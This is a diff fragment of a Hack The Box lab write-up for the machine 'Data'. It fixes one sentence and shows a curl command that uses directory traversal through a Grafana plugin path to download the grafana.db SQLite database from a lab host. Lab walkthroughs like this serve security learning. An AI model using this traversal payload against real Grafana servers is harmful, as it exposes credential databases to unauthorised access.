CyberGitLabs/security-writeups/Hack The Box Machines/Linux/Data.md

 **curl `http://10.129.234.47:3000/public/plugins/stat/../../../../../../../../../../../../../../../../var/lib/grafana/grafana.db` --path-as-is -o file_db**

-Checking the type of the .db file we can see that is a Sqlite3 file:
+Checking the type of the .db file we can see that it is a Sqlite3 file:

 ![diagram](../../images/Data/Data_dbfile.png)